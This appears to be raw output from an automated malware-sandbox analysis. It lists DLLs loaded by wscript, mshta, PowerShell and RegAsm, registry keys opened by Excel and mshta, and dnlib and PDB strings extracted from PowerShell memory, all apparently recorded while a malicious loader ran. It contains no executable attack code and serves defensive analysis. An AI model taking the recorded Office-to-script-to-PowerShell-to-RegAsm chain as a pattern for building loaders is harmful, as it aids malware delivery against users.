Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdb source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdb source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdbhPB source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdbhPB source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
